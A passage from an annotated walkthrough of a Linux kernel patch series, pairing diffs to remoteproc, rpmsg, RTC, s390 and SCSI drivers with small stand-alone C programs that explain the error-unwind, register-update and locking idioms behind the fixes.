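static int prepare(void) { return 0; }  /* e.g. clk_prepare_enable() */
static void finish(void) { }            /* e.g. clk_disable_unprepare() */

static int send(int msg)
{
    int ret = prepare();

    /* Acquire resources before the lock: an early failure
     * returns without ever entering the critical section... */
    if (ret)
        return ret;

    pthread_mutex_lock(&lock);
    shared_state = msg;         /* only this needs the lock */
    pthread_mutex_unlock(&lock);

    /* ...and teardown happens outside it, so other senders
     * are not serialized behind the clock operations. */
    finish();
    return 0;
}

int main(void)
{
    printf("%d\n", send(42));
    return 0;
}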
+diff --git a/drivers/remoteproc/qcom_q6v5_mss.c b/drivers/remoteproc/qcom_q6v5_mss.c
+index fddb63cffee07..7dbab5fcbe1e7 100644
+--- a/drivers/remoteproc/qcom_q6v5_mss.c
++++ b/drivers/remoteproc/qcom_q6v5_mss.c
+@@ -10,7 +10,6 @@
+ #include <linux/clk.h>
+ #include <linux/delay.h>
+ #include <linux/devcoredump.h>
+-#include <linux/dma-map-ops.h>
+ #include <linux/dma-mapping.h>
+ #include <linux/interrupt.h>
+ #include <linux/kernel.h>
+@@ -18,6 +17,7 @@
+ #include <linux/module.h>
+ #include <linux/of_address.h>
+ #include <linux/of_device.h>
++#include <linux/of_reserved_mem.h>
+ #include <linux/platform_device.h>
+ #include <linux/pm_domain.h>
+ #include <linux/pm_runtime.h>
+@@ -211,6 +211,9 @@ struct q6v5 {
+ 	size_t mba_size;
+ 	size_t dp_size;
+ 
++	phys_addr_t mdata_phys;
++	size_t mdata_size;
++
+ 	phys_addr_t mpss_phys;
+ 	phys_addr_t mpss_reloc;
+ 	size_t mpss_size;
+@@ -933,52 +936,47 @@ static void q6v5proc_halt_axi_port(struct q6v5 *qproc,
+ static int q6v5_mpss_init_image(struct q6v5 *qproc, const struct firmware *fw,
+ 				const char *fw_name)
+ {
+-	unsigned long dma_attrs = DMA_ATTR_FORCE_CONTIGUOUS | DMA_ATTR_NO_KERNEL_MAPPING;
+-	unsigned long flags = VM_DMA_COHERENT | VM_FLUSH_RESET_PERMS;
+-	struct page **pages;
+-	struct page *page;
++	unsigned long dma_attrs = DMA_ATTR_FORCE_CONTIGUOUS;
+ 	dma_addr_t phys;
+ 	void *metadata;
+ 	int mdata_perm;
+ 	int xferop_ret;
+ 	size_t size;
+-	void *vaddr;
+-	int count;
++	void *ptr;
+ 	int ret;
+-	int i;
+ 
+ 	metadata = qcom_mdt_read_metadata(fw, &size, fw_name, qproc->dev);
+ 	if (IS_ERR(metadata))
+ 		return PTR_ERR(metadata);
+ 
+-	page = dma_alloc_attrs(qproc->dev, size, &phys, GFP_KERNEL, dma_attrs);
+-	if (!page) {
+-		kfree(metadata);
+-		dev_err(qproc->dev, "failed to allocate mdt buffer\n");
+-		return -ENOMEM;
+-	}
+-
+-	count = PAGE_ALIGN(size) >> PAGE_SHIFT;
+-	pages = kmalloc_array(count, sizeof(struct page *), GFP_KERNEL);
+-	if (!pages) {
+-		ret = -ENOMEM;
+-		goto free_dma_attrs;
+-	}
+-
+-	for (i = 0; i < count; i++)
+-		pages[i] = nth_page(page, i);
++	if (qproc->mdata_phys) {
++		if (size > qproc->mdata_size) {
++			ret = -EINVAL;
++			dev_err(qproc->dev, "metadata size outside memory range\n");
++			goto free_metadata;
++		}
+ 
+-	vaddr = vmap(pages, count, flags, pgprot_dmacoherent(PAGE_KERNEL));
+-	kfree(pages);
+-	if (!vaddr) {
+-		dev_err(qproc->dev, "unable to map memory region: %pa+%zx\n", &phys, size);
+-		ret = -EBUSY;
+-		goto free_dma_attrs;
++		phys = qproc->mdata_phys;
++		ptr = memremap(qproc->mdata_phys, size, MEMREMAP_WC);
++		if (!ptr) {
++			ret = -EBUSY;
++			dev_err(qproc->dev, "unable to map memory region: %pa+%zx\n",
++				&qproc->mdata_phys, size);
++			goto free_metadata;
++		}
++	} else {
++		ptr = dma_alloc_attrs(qproc->dev, size, &phys, GFP_KERNEL, dma_attrs);
++		if (!ptr) {
++			ret = -ENOMEM;
++			dev_err(qproc->dev, "failed to allocate mdt buffer\n");
++			goto free_metadata;
++		}
+ 	}
+ 
+-	memcpy(vaddr, metadata, size);
++	memcpy(ptr, metadata, size);
+ 
+-	vunmap(vaddr);
++	if (qproc->mdata_phys)
++		memunmap(ptr);
+ 
+ 	/* Hypervisor mapping to access metadata by modem */
+ 	mdata_perm = BIT(QCOM_SCM_VMID_HLOS);
+@@ -1008,7 +1006,9 @@ static int q6v5_mpss_init_image(struct q6v5 *qproc, const struct firmware *fw,
+ 			 "mdt buffer not reclaimed system may become unstable\n");
+ 
+ free_dma_attrs:
+-	dma_free_attrs(qproc->dev, size, page, phys, dma_attrs);
++	if (!qproc->mdata_phys)
++		dma_free_attrs(qproc->dev, size, ptr, phys, dma_attrs);
++free_metadata:
+ 	kfree(metadata);
+ 
+ 	return ret < 0 ? ret : 0;
+@@ -1836,6 +1836,7 @@ static int q6v5_init_reset(struct q6v5 *qproc)
+ static int q6v5_alloc_memory_region(struct q6v5 *qproc)
+ {
+ 	struct device_node *child;
++	struct reserved_mem *rmem;
+ 	struct device_node *node;
+ 	struct resource r;
+ 	int ret;
+@@ -1882,6 +1883,26 @@ static int q6v5_alloc_memory_region(struct q6v5 *qproc)
+ 	qproc->mpss_phys = qproc->mpss_reloc = r.start;
+ 	qproc->mpss_size = resource_size(&r);
+ 
++	if (!child) {
++		node = of_parse_phandle(qproc->dev->of_node, "memory-region", 2);
++	} else {
++		child = of_get_child_by_name(qproc->dev->of_node, "metadata");
++		node = of_parse_phandle(child, "memory-region", 0);
++		of_node_put(child);
++	}
++
++	if (!node)
++		return 0;
++
++	rmem = of_reserved_mem_lookup(node);
++	if (!rmem) {
++		dev_err(qproc->dev, "unable to resolve metadata region\n");
++		return -EINVAL;
++	}
++
++	qproc->mdata_phys = rmem->base;
++	qproc->mdata_size = rmem->size;
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/rpmsg/qcom_glink_native.c b/drivers/rpmsg/qcom_glink_native.c
+index 115c0a1eddb10..35df1b0a515bf 100644
+--- a/drivers/rpmsg/qcom_glink_native.c
++++ b/drivers/rpmsg/qcom_glink_native.c
+@@ -954,6 +954,7 @@ static void qcom_glink_handle_intent(struct qcom_glink *glink,
+ 	spin_unlock_irqrestore(&glink->idr_lock, flags);
+ 	if (!channel) {
+ 		dev_err(glink->dev, "intents for non-existing channel\n");
++		qcom_glink_rx_advance(glink, ALIGN(msglen, 8));
+ 		return;
+ 	}
+ 
+@@ -1446,6 +1447,7 @@ static void qcom_glink_rpdev_release(struct device *dev)
+ {
+ 	struct rpmsg_device *rpdev = to_rpmsg_device(dev);
+ 
++	kfree(rpdev->driver_override);
+ 	kfree(rpdev);
+ }
+ 
+@@ -1689,6 +1691,7 @@ static void qcom_glink_device_release(struct device *dev)
+ 
+ 	/* Release qcom_glink_alloc_channel() reference */
+ 	kref_put(&channel->refcount, qcom_glink_channel_release);
++	kfree(rpdev->driver_override);
+ 	kfree(rpdev);
+ }
+ 
+diff --git a/drivers/rtc/rtc-pm8xxx.c b/drivers/rtc/rtc-pm8xxx.c
+index dc6d1476baa59..e10e2c8730602 100644
+--- a/drivers/rtc/rtc-pm8xxx.c
++++ b/drivers/rtc/rtc-pm8xxx.c
+@@ -221,7 +221,6 @@ static int pm8xxx_rtc_set_alarm(struct device *dev, struct rtc_wkalrm *alarm)
+ {
+ 	int rc, i;
+ 	u8 value[NUM_8_BIT_RTC_REGS];
+-	unsigned int ctrl_reg;
+ 	unsigned long secs, irq_flags;
+ 	struct pm8xxx_rtc *rtc_dd = dev_get_drvdata(dev);
+ 	const struct pm8xxx_rtc_regs *regs = rtc_dd->regs;
+@@ -233,6 +232,11 @@ static int pm8xxx_rtc_set_alarm(struct device *dev, struct rtc_wkalrm *alarm)
+ 		secs >>= 8;
+ 	}
+ 
++	rc = regmap_update_bits(rtc_dd->regmap, regs->alarm_ctrl,
++				regs->alarm_en, 0);
++	if (rc)
++		return rc;
++
+ 	spin_lock_irqsave(&rtc_dd->ctrl_reg_lock, irq_flags);
+ 
+ 	rc = regmap_bulk_write(rtc_dd->regmap, regs->alarm_rw, value,
+@@ -242,19 +246,11 @@ static int pm8xxx_rtc_set_alarm(struct device *dev, struct rtc_wkalrm *alarm)
+ 		goto rtc_rw_fail;
+ 	}
+ 
+-	rc = regmap_read(rtc_dd->regmap, regs->alarm_ctrl, &ctrl_reg);
+-	if (rc)
+-		goto rtc_rw_fail;
+-
+-	if (alarm->enabled)
+-		ctrl_reg |= regs->alarm_en;
+-	else
+-		ctrl_reg &= ~regs->alarm_en;
+-
+-	rc = regmap_write(rtc_dd->regmap, regs->alarm_ctrl, ctrl_reg);
+-	if (rc) {
+-		dev_err(dev, "Write to RTC alarm control register failed\n");
+-		goto rtc_rw_fail;
++	if (alarm->enabled) {
++		rc = regmap_update_bits(rtc_dd->regmap, regs->alarm_ctrl,
++					regs->alarm_en, regs->alarm_en);
++		if (rc)
++			goto rtc_rw_fail;
+ 	}
+ 
+ 	dev_dbg(dev, "Alarm Set for h:m:s=%ptRt, y-m-d=%ptRdr\n",
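The rtc-pm8xxx change replaces the open-coded read/modify/write of the alarm control register with regmap_update_bits() and, more importantly, clears the enable bit before the new alarm time is written, so a half-written comparator value cannot fire. regmap_update_bits() is conceptually a masked read-modify-write; a stand-alone model (reg_read()/reg_write() are fake bus accessors, not kernel API):

#include <stdint.h>
#include <stdio.h>

static uint8_t fake_reg = 0xa5;

static int reg_read(uint8_t *val) { *val = fake_reg; return 0; }
static int reg_write(uint8_t val) { fake_reg = val; return 0; }

/* Masked read-modify-write: only bits in mask change. */
static int update_bits(uint8_t mask, uint8_t val)
{
    uint8_t tmp;
    int ret = reg_read(&tmp);

    if (ret)
        return ret;
    tmp = (tmp & ~mask) | (val & mask);
    return reg_write(tmp);
}

#define ALARM_EN 0x80

int main(void)
{
    update_bits(ALARM_EN, 0);            /* disable alarm first */
    /* ... write the new alarm time registers here ... */
    update_bits(ALARM_EN, ALARM_EN);     /* then re-enable */
    printf("reg = 0x%02x\n", fake_reg);  /* 0xa5 again */
    return 0;
}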
+diff --git a/drivers/s390/block/dasd_eckd.c b/drivers/s390/block/dasd_eckd.c
+index 5d0b9991e91a4..b20ce86b97b29 100644
+--- a/drivers/s390/block/dasd_eckd.c
++++ b/drivers/s390/block/dasd_eckd.c
+@@ -6956,8 +6956,10 @@ dasd_eckd_init(void)
+ 		return -ENOMEM;
+ 	dasd_vol_info_req = kmalloc(sizeof(*dasd_vol_info_req),
+ 				    GFP_KERNEL | GFP_DMA);
+-	if (!dasd_vol_info_req)
++	if (!dasd_vol_info_req) {
++		kfree(dasd_reserve_req);
+ 		return -ENOMEM;
++	}
+ 	pe_handler_worker = kmalloc(sizeof(*pe_handler_worker),
+ 				    GFP_KERNEL | GFP_DMA);
+ 	if (!pe_handler_worker) {
+diff --git a/drivers/s390/char/sclp_early.c b/drivers/s390/char/sclp_early.c
+index d15b0d541de36..140d4ee29105c 100644
+--- a/drivers/s390/char/sclp_early.c
++++ b/drivers/s390/char/sclp_early.c
+@@ -161,7 +161,7 @@ static void __init sclp_early_console_detect(struct init_sccb *sccb)
+ 		sclp.has_linemode = 1;
+ }
+ 
+-void __init sclp_early_adjust_va(void)
++void __init __no_sanitize_address sclp_early_adjust_va(void)
+ {
+ 	sclp_early_sccb = __va((unsigned long)sclp_early_sccb);
+ }
+diff --git a/drivers/s390/crypto/vfio_ap_ops.c b/drivers/s390/crypto/vfio_ap_ops.c
+index 0b4cc8c597ae6..934515959ebf4 100644
+--- a/drivers/s390/crypto/vfio_ap_ops.c
++++ b/drivers/s390/crypto/vfio_ap_ops.c
+@@ -349,6 +349,8 @@ static int vfio_ap_validate_nib(struct kvm_vcpu *vcpu, dma_addr_t *nib)
+ {
+ 	*nib = vcpu->run->s.regs.gprs[2];
+ 
++	if (!*nib)
++		return -EINVAL;
+ 	if (kvm_is_error_hva(gfn_to_hva(vcpu->kvm, *nib >> PAGE_SHIFT)))
+ 		return -EINVAL;
+ 
+@@ -1844,8 +1846,10 @@ int vfio_ap_mdev_probe_queue(struct ap_device *apdev)
+ 		return ret;
+ 
+ 	q = kzalloc(sizeof(*q), GFP_KERNEL);
+-	if (!q)
+-		return -ENOMEM;
++	if (!q) {
++		ret = -ENOMEM;
++		goto err_remove_group;
++	}
+ 
+ 	q->apqn = to_ap_queue(&apdev->device)->qid;
+ 	q->saved_isc = VFIO_AP_ISC_INVALID;
+@@ -1863,6 +1867,10 @@ int vfio_ap_mdev_probe_queue(struct ap_device *apdev)
+ 	release_update_locks_for_mdev(matrix_mdev);
+ 
+ 	return 0;
++
++err_remove_group:
++	sysfs_remove_group(&apdev->device.kobj, &vfio_queue_attr_group);
++	return ret;
+ }
+ 
+ void vfio_ap_mdev_remove_queue(struct ap_device *apdev)
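The vfio_ap probe hunk is the standard kernel error-unwind idiom: each acquired resource gets a goto label, and a later failure (here the kzalloc) jumps to labels that undo the earlier steps in reverse order. The skeleton in plain C (setup_group()/remove_group() are placeholders for the sysfs group calls):

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>

static int setup_group(void)   { puts("group added");   return 0; }
static void remove_group(void) { puts("group removed"); }

static int probe(int fail_alloc)
{
    void *q;
    int ret = setup_group();

    if (ret)
        return ret;

    q = fail_alloc ? NULL : malloc(64);
    if (!q) {
        ret = -ENOMEM;
        goto err_remove_group;  /* undo earlier steps in reverse */
    }

    free(q);
    return 0;

err_remove_group:
    remove_group();
    return ret;
}

int main(void)
{
    printf("probe -> %d\n", probe(1));  /* -12, and group removed */
    return 0;
}

Before the fix, the early return on allocation failure left the sysfs group registered with no queue behind it.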
+diff --git a/drivers/scsi/aacraid/aachba.c b/drivers/scsi/aacraid/aachba.c
+index 4d4cb47b38467..24c049eff157a 100644
+--- a/drivers/scsi/aacraid/aachba.c
++++ b/drivers/scsi/aacraid/aachba.c
+@@ -818,8 +818,8 @@ static void aac_probe_container_scsi_done(struct scsi_cmnd *scsi_cmnd)
+ 
+ int aac_probe_container(struct aac_dev *dev, int cid)
+ {
+-	struct scsi_cmnd *scsicmd = kzalloc(sizeof(*scsicmd), GFP_KERNEL);
+-	struct aac_cmd_priv *cmd_priv = aac_priv(scsicmd);
++	struct aac_cmd_priv *cmd_priv;
++	struct scsi_cmnd *scsicmd = kzalloc(sizeof(*scsicmd) + sizeof(*cmd_priv), GFP_KERNEL);
+ 	struct scsi_device *scsidev = kzalloc(sizeof(*scsidev), GFP_KERNEL);
+ 	int status;
+ 
+@@ -838,6 +838,7 @@ int aac_probe_container(struct aac_dev *dev, int cid)
+ 		while (scsicmd->device == scsidev)
+ 			schedule();
+ 	kfree(scsidev);
++	cmd_priv = aac_priv(scsicmd);
+ 	status = cmd_priv->status;
+ 	kfree(scsicmd);
+ 	return status;
+diff --git a/drivers/scsi/aic94xx/aic94xx_task.c b/drivers/scsi/aic94xx/aic94xx_task.c
+index ed119a3f6f2ed..7f02083001100 100644
+--- a/drivers/scsi/aic94xx/aic94xx_task.c
++++ b/drivers/scsi/aic94xx/aic94xx_task.c
+@@ -50,6 +50,9 @@ static int asd_map_scatterlist(struct sas_task *task,
+ 		dma_addr_t dma = dma_map_single(&asd_ha->pcidev->dev, p,
+ 						task->total_xfer_len,
+ 						task->data_dir);
++		if (dma_mapping_error(&asd_ha->pcidev->dev, dma))
++			return -ENOMEM;
++
+ 		sg_arr[0].bus_addr = cpu_to_le64((u64)dma);
+ 		sg_arr[0].size = cpu_to_le32(task->total_xfer_len);
+ 		sg_arr[0].flags |= ASD_SG_EL_LIST_EOL;
+diff --git a/drivers/scsi/lpfc/lpfc_sli.c b/drivers/scsi/lpfc/lpfc_sli.c
+index 21c52154626f1..b93c948c4fcc4 100644
+--- a/drivers/scsi/lpfc/lpfc_sli.c
++++ b/drivers/scsi/lpfc/lpfc_sli.c
+@@ -20802,6 +20802,7 @@ lpfc_wr_object(struct lpfc_hba *phba, struct list_head *dmabuf_list,
+ 	struct lpfc_mbx_wr_object *wr_object;
+ 	LPFC_MBOXQ_t *mbox;
+ 	int rc = 0, i = 0;
++	int mbox_status = 0;
+ 	uint32_t shdr_status, shdr_add_status, shdr_add_status_2;
+ 	uint32_t shdr_change_status = 0, shdr_csf = 0;
+ 	uint32_t mbox_tmo;
+@@ -20847,11 +20848,15 @@ lpfc_wr_object(struct lpfc_hba *phba, struct list_head *dmabuf_list,
+ 	wr_object->u.request.bde_count = i;
+ 	bf_set(lpfc_wr_object_write_length, &wr_object->u.request, written);
+ 	if (!phba->sli4_hba.intr_enable)
+-		rc = lpfc_sli_issue_mbox(phba, mbox, MBX_POLL);
++		mbox_status = lpfc_sli_issue_mbox(phba, mbox, MBX_POLL);
+ 	else {
+ 		mbox_tmo = lpfc_mbox_tmo_val(phba, mbox);
+-		rc = lpfc_sli_issue_mbox_wait(phba, mbox, mbox_tmo);
++		mbox_status = lpfc_sli_issue_mbox_wait(phba, mbox, mbox_tmo);
+ 	}
++
++	/* The mbox status needs to be maintained to detect MBOX_TIMEOUT. */
++	rc = mbox_status;
++
+ 	/* The IOCTL status is embedded in the mailbox subheader. */
+ 	shdr_status = bf_get(lpfc_mbox_hdr_status,
+ 			     &wr_object->header.cfg_shdr.response);
+@@ -20866,10 +20871,6 @@ lpfc_wr_object(struct lpfc_hba *phba, struct list_head *dmabuf_list,
+ 				  &wr_object->u.response);
+ 	}
+ 
+-	if (!phba->sli4_hba.intr_enable)
+-		mempool_free(mbox, phba->mbox_mem_pool);
+-	else if (rc != MBX_TIMEOUT)
+-		mempool_free(mbox, phba->mbox_mem_pool);
+ 	if (shdr_status || shdr_add_status || shdr_add_status_2 || rc) {
+ 		lpfc_printf_log(phba, KERN_ERR, LOG_TRACE_EVENT,
+ 				"3025 Write Object mailbox failed with "
+@@ -20887,6 +20888,12 @@ lpfc_wr_object(struct lpfc_hba *phba, struct list_head *dmabuf_list,
+ 		lpfc_log_fw_write_cmpl(phba, shdr_status, shdr_add_status,
+ 				       shdr_add_status_2, shdr_change_status,
+ 				       shdr_csf);
++
++	if (!phba->sli4_hba.intr_enable)
++		mempool_free(mbox, phba->mbox_mem_pool);
++	else if (mbox_status != MBX_TIMEOUT)
++		mempool_free(mbox, phba->mbox_mem_pool);
++
+ 	return rc;
+ }
+ 
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_app.c b/drivers/scsi/mpi3mr/mpi3mr_app.c
+index 9baac224b2135..bff6377023979 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_app.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_app.c
+@@ -293,7 +293,6 @@ out:
+ static long mpi3mr_get_all_tgt_info(struct mpi3mr_ioc *mrioc,
+ 	struct bsg_job *job)
+ {
+-	long rval = -EINVAL;
+ 	u16 num_devices = 0, i = 0, size;
+ 	unsigned long flags;
+ 	struct mpi3mr_tgt_dev *tgtdev;
+@@ -304,7 +303,7 @@ static long mpi3mr_get_all_tgt_info(struct mpi3mr_ioc *mrioc,
+ 	if (job->request_payload.payload_len < sizeof(u32)) {
+ 		dprint_bsg_err(mrioc, "%s: invalid size argument\n",
+ 		    __func__);
+-		return rval;
++		return -EINVAL;
+ 	}
+ 
+ 	spin_lock_irqsave(&mrioc->tgtdev_lock, flags);
+@@ -312,7 +311,7 @@ static long mpi3mr_get_all_tgt_info(struct mpi3mr_ioc *mrioc,
+ 		num_devices++;
+ 	spin_unlock_irqrestore(&mrioc->tgtdev_lock, flags);
+ 
+-	if ((job->request_payload.payload_len == sizeof(u32)) ||
++	if ((job->request_payload.payload_len <= sizeof(u64)) ||
+ 		list_empty(&mrioc->tgtdev_list)) {
+ 		sg_copy_from_buffer(job->request_payload.sg_list,
+ 				    job->request_payload.sg_cnt,
+@@ -320,14 +319,14 @@ static long mpi3mr_get_all_tgt_info(struct mpi3mr_ioc *mrioc,
+ 		return 0;
+ 	}
+ 
+-	kern_entrylen = (num_devices - 1) * sizeof(*devmap_info);
+-	size = sizeof(*alltgt_info) + kern_entrylen;
++	kern_entrylen = num_devices * sizeof(*devmap_info);
++	size = sizeof(u64) + kern_entrylen;
+ 	alltgt_info = kzalloc(size, GFP_KERNEL);
+ 	if (!alltgt_info)
+ 		return -ENOMEM;
+ 
+ 	devmap_info = alltgt_info->dmi;
+-	memset((u8 *)devmap_info, 0xFF, (kern_entrylen + sizeof(*devmap_info)));
++	memset((u8 *)devmap_info, 0xFF, kern_entrylen);
+ 	spin_lock_irqsave(&mrioc->tgtdev_lock, flags);
+ 	list_for_each_entry(tgtdev, &mrioc->tgtdev_list, list) {
+ 		if (i < num_devices) {
+@@ -344,25 +343,18 @@ static long mpi3mr_get_all_tgt_info(struct mpi3mr_ioc *mrioc,
+ 	num_devices = i;
+ 	spin_unlock_irqrestore(&mrioc->tgtdev_lock, flags);
+ 
+-	memcpy(&alltgt_info->num_devices, &num_devices, sizeof(num_devices));
++	alltgt_info->num_devices = num_devices;
+ 
+-	usr_entrylen = (job->request_payload.payload_len - sizeof(u32)) / sizeof(*devmap_info);
++	usr_entrylen = (job->request_payload.payload_len - sizeof(u64)) /
++		sizeof(*devmap_info);
+ 	usr_entrylen *= sizeof(*devmap_info);
+ 	min_entrylen = min(usr_entrylen, kern_entrylen);
+-	if (min_entrylen && (!memcpy(&alltgt_info->dmi, devmap_info, min_entrylen))) {
+-		dprint_bsg_err(mrioc, "%s:%d: device map info copy failed\n",
+-		    __func__, __LINE__);
+-		rval = -EFAULT;
+-		goto out;
+-	}
+ 
+ 	sg_copy_from_buffer(job->request_payload.sg_list,
+ 			    job->request_payload.sg_cnt,
+-			    alltgt_info, job->request_payload.payload_len);
+-	rval = 0;
+-out:
++			    alltgt_info, (min_entrylen + sizeof(u64)));
+ 	kfree(alltgt_info);
+-	return rval;
++	return 0;
+ }
+ /**
+  * mpi3mr_get_change_count - Get topology change count
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_os.c b/drivers/scsi/mpi3mr/mpi3mr_os.c
+index 3306de7170f64..6eaeba41072cb 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_os.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_os.c
+@@ -4952,6 +4952,10 @@ mpi3mr_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 		mpi3mr_init_drv_cmd(&mrioc->dev_rmhs_cmds[i],
+ 		    MPI3MR_HOSTTAG_DEVRMCMD_MIN + i);
+ 
++	for (i = 0; i < MPI3MR_NUM_EVTACKCMD; i++)
++		mpi3mr_init_drv_cmd(&mrioc->evtack_cmds[i],
++				    MPI3MR_HOSTTAG_EVTACKCMD_MIN + i);
++
+ 	if (pdev->revision)
+ 		mrioc->enable_segqueue = true;
+ 
+diff --git a/drivers/scsi/mpt3sas/mpt3sas_base.c b/drivers/scsi/mpt3sas/mpt3sas_base.c
+index 4e981ccaac416..2ee9ea57554d7 100644
+--- a/drivers/scsi/mpt3sas/mpt3sas_base.c
++++ b/drivers/scsi/mpt3sas/mpt3sas_base.c
+@@ -2992,8 +2992,7 @@ _base_config_dma_addressing(struct MPT3SAS_ADAPTER *ioc, struct pci_dev *pdev)
+ 	struct sysinfo s;
+ 	u64 coherent_dma_mask, dma_mask;
+ 
+-	if (ioc->is_mcpu_endpoint || sizeof(dma_addr_t) == 4 ||
+-	    dma_get_required_mask(&pdev->dev) <= DMA_BIT_MASK(32)) {
++	if (ioc->is_mcpu_endpoint || sizeof(dma_addr_t) == 4) {
+ 		ioc->dma_mask = 32;
+ 		coherent_dma_mask = dma_mask = DMA_BIT_MASK(32);
+ 	/* Set 63 bit DMA mask for all SAS3 and SAS35 controllers */
+@@ -5850,6 +5849,9 @@ _base_release_memory_pools(struct MPT3SAS_ADAPTER *ioc)
+ 		}
+ 		dma_pool_destroy(ioc->pcie_sgl_dma_pool);
+ 	}
++	kfree(ioc->pcie_sg_lookup);
++	ioc->pcie_sg_lookup = NULL;
++
+ 	if (ioc->config_page) {
+ 		dexitprintk(ioc,
+ 			    ioc_info(ioc, "config_page(0x%p): free\n",
+diff --git a/drivers/scsi/qla2xxx/qla_bsg.c b/drivers/scsi/qla2xxx/qla_bsg.c
+index cd75b179410d7..dba7bba788d76 100644
+--- a/drivers/scsi/qla2xxx/qla_bsg.c
++++ b/drivers/scsi/qla2xxx/qla_bsg.c
+@@ -278,8 +278,8 @@ qla2x00_process_els(struct bsg_job *bsg_job)
+ 	const char *type;
+ 	int req_sg_cnt, rsp_sg_cnt;
+ 	int rval =  (DID_ERROR << 16);
+-	uint16_t nextlid = 0;
+ 	uint32_t els_cmd = 0;
++	int qla_port_allocated = 0;
+ 
+ 	if (bsg_request->msgcode == FC_BSG_RPT_ELS) {
+ 		rport = fc_bsg_to_rport(bsg_job);
+@@ -329,9 +329,9 @@ qla2x00_process_els(struct bsg_job *bsg_job)
+ 		/* make sure the rport is logged in,
+ 		 * if not perform fabric login
+ 		 */
+-		if (qla2x00_fabric_login(vha, fcport, &nextlid)) {
++		if (atomic_read(&fcport->state) != FCS_ONLINE) {
+ 			ql_dbg(ql_dbg_user, vha, 0x7003,
+-			    "Failed to login port %06X for ELS passthru.\n",
++			    "Port %06X is not online for ELS passthru.\n",
+ 			    fcport->d_id.b24);
+ 			rval = -EIO;
+ 			goto done;
+@@ -348,6 +348,7 @@ qla2x00_process_els(struct bsg_job *bsg_job)
+ 			goto done;
+ 		}
+ 
++		qla_port_allocated = 1;
+ 		/* Initialize all required  fields of fcport */
+ 		fcport->vha = vha;
+ 		fcport->d_id.b.al_pa =
+@@ -432,7 +433,7 @@ done_unmap_sg:
+ 	goto done_free_fcport;
+ 
+ done_free_fcport:
+-	if (bsg_request->msgcode != FC_BSG_RPT_ELS)
++	if (qla_port_allocated)
+ 		qla2x00_free_fcport(fcport);
+ done:
+ 	return rval;
+diff --git a/drivers/scsi/qla2xxx/qla_def.h b/drivers/scsi/qla2xxx/qla_def.h
+index a26a373be9da3..cd4eb11b07079 100644
+--- a/drivers/scsi/qla2xxx/qla_def.h
++++ b/drivers/scsi/qla2xxx/qla_def.h
+@@ -660,7 +660,7 @@ enum {
+ 
+ struct iocb_resource {
+ 	u8 res_type;
+-	u8 pad;
++	u8  exch_cnt;
+ 	u16 iocb_cnt;
+ };
+ 
+@@ -3721,6 +3721,10 @@ struct qla_fw_resources {
+ 	u16 iocbs_limit;
+ 	u16 iocbs_qp_limit;
+ 	u16 iocbs_used;
++	u16 exch_total;
++	u16 exch_limit;
++	u16 exch_used;
++	u16 pad;
+ };
+ 
+ #define QLA_IOCB_PCT_LIMIT 95
+diff --git a/drivers/scsi/qla2xxx/qla_dfs.c b/drivers/scsi/qla2xxx/qla_dfs.c
+index 777808af56347..1925cc6897b68 100644
+--- a/drivers/scsi/qla2xxx/qla_dfs.c
++++ b/drivers/scsi/qla2xxx/qla_dfs.c
+@@ -235,7 +235,7 @@ qla_dfs_fw_resource_cnt_show(struct seq_file *s, void *unused)
+ 	uint16_t mb[MAX_IOCB_MB_REG];
+ 	int rc;
+ 	struct qla_hw_data *ha = vha->hw;
+-	u16 iocbs_used, i;
++	u16 iocbs_used, i, exch_used;
+ 
+ 	rc = qla24xx_res_count_wait(vha, mb, SIZEOF_IOCB_MB_REG);
+ 	if (rc != QLA_SUCCESS) {
+@@ -263,13 +263,19 @@ qla_dfs_fw_resource_cnt_show(struct seq_file *s, void *unused)
+ 	if (ql2xenforce_iocb_limit) {
+ 		/* lock is not require. It's an estimate. */
+ 		iocbs_used = ha->base_qpair->fwres.iocbs_used;
++		exch_used = ha->base_qpair->fwres.exch_used;
+ 		for (i = 0; i < ha->max_qpairs; i++) {
+-			if (ha->queue_pair_map[i])
++			if (ha->queue_pair_map[i]) {
+ 				iocbs_used += ha->queue_pair_map[i]->fwres.iocbs_used;
++				exch_used += ha->queue_pair_map[i]->fwres.exch_used;
++			}
+ 		}
+ 
+ 		seq_printf(s, "Driver: estimate iocb used [%d] high water limit [%d]\n",
+ 			   iocbs_used, ha->base_qpair->fwres.iocbs_limit);
++
++		seq_printf(s, "estimate exchange used [%d] high water limit [%d]\n",
++			   exch_used, ha->base_qpair->fwres.exch_limit);
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/scsi/qla2xxx/qla_edif.c b/drivers/scsi/qla2xxx/qla_edif.c
+index 00ccc41cef147..1cafd27d5a609 100644
+--- a/drivers/scsi/qla2xxx/qla_edif.c
++++ b/drivers/scsi/qla2xxx/qla_edif.c
+@@ -925,7 +925,9 @@ qla_edif_app_getfcinfo(scsi_qla_host_t *vha, struct bsg_job *bsg_job)
+ 			if (!(fcport->flags & FCF_FCSP_DEVICE))
+ 				continue;
+ 
+-			tdid = app_req.remote_pid;
++			tdid.b.domain = app_req.remote_pid.domain;
++			tdid.b.area = app_req.remote_pid.area;
++			tdid.b.al_pa = app_req.remote_pid.al_pa;
+ 
+ 			ql_dbg(ql_dbg_edif, vha, 0x2058,
+ 			    "APP request entry - portid=%06x.\n", tdid.b24);
+@@ -2989,9 +2991,10 @@ qla28xx_start_scsi_edif(srb_t *sp)
+ 	tot_dsds = nseg;
+ 	req_cnt = qla24xx_calc_iocbs(vha, tot_dsds);
+ 
+-	sp->iores.res_type = RESOURCE_INI;
++	sp->iores.res_type = RESOURCE_IOCB | RESOURCE_EXCH;
++	sp->iores.exch_cnt = 1;
+ 	sp->iores.iocb_cnt = req_cnt;
+-	if (qla_get_iocbs(sp->qpair, &sp->iores))
++	if (qla_get_fw_resources(sp->qpair, &sp->iores))
+ 		goto queuing_error;
+ 
+ 	if (req->cnt < (req_cnt + 2)) {
+@@ -3185,7 +3188,7 @@ queuing_error:
+ 		mempool_free(sp->u.scmd.ct6_ctx, ha->ctx_mempool);
+ 		sp->u.scmd.ct6_ctx = NULL;
+ 	}
